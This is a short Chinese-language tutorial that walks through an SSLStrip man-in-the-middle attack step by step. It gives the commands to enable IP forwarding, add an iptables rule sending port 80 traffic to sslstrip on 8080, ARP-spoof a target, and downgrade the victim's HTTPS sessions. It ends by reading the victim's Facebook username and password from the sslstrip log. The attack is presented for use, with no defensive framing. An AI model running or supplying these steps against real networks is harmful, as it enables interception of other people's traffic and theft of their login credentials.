利用sslstrip對HTTPS連線發起中間人攻擊
利用SSLStrip發起中間人攻擊可以透明地劫持網路中的http流量,查詢HTTPS連結並重定向,然後將這些連結對映到類似的HTTP連結中或者同形的HTTPS連結。
它還支援提供類似鎖定圖示,選擇性日誌記錄和拒絕會話的模式。
step1
首先我們將裝置設定為轉發模式,這樣我們的裝置就可以轉發目標不是我們裝置的資料包。
echo 1>/proc/sys/net/ipv4/ip_forward
step2
還需要設定iptables,將流量從80埠重定向到8080埠,確保出站連線傳送到sslstrip中。
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
step3
需要找到我們的閘道器
route -n
前三步如圖所示
step4
接下來我們需要找到目標主機的IP地址
step5
攻擊者利用ARP欺騙技術將虛假的ARP訊息傳送到區域網中。
arpspoof -i -t
step6
現在我們開啟一個新的終端並監聽8080埠,命令如下
sslstrip -l 8080
step7
現在我們轉到受害主機中,並且在瀏覽器中輸入facebook.com,我們知道Facebook本來是使用的HTTPS協議,但是這裡我們看到與Facebook是通過http建立的連線。
step8
現在,返回到家目錄,檢視sslstrip.log日誌檔案,我們可以看到受害者登入時輸入的使用者名稱和密碼,如圖: